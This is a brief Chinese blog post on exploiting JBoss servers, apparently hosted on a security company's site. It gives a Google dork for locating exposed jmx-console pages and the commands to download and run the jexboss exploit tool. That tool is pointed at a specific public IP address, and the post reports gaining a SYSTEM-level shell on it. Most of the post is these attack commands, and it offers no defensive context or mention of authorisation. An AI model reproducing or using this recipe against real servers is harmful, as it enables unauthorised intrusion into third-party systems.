登陆 注册

Jboss漏洞利用

张三 2019-05-27 Jboss漏洞利用
乐山桑云信息技术有限公司(www.sangyun.net)专注于企业安全与网站、小程序、APP架设,为企业客户提供一站式解决方案,帮助企业快速实现互联网+转型。

谷歌搜索:inurl:”8080/jmx-console/”

下载jexboss 

在github中搜索jexboss下载漏洞利用代码

还可以在kali中直接下载 

git clone https://github.com/joaomatosf/jexboss.git

通过阅读readme文件,查看使用方法,先安装模板

pip install -r requires.txt

执行jexboss.py文件,拿到shell

python jexboss.py -host http://189.72.172.85:8080

成功的得到shell 还是system权限

生成海报
请发表您的评论
请关注微信公众号
微信二维码
不容错过
Powered By SangYun.Net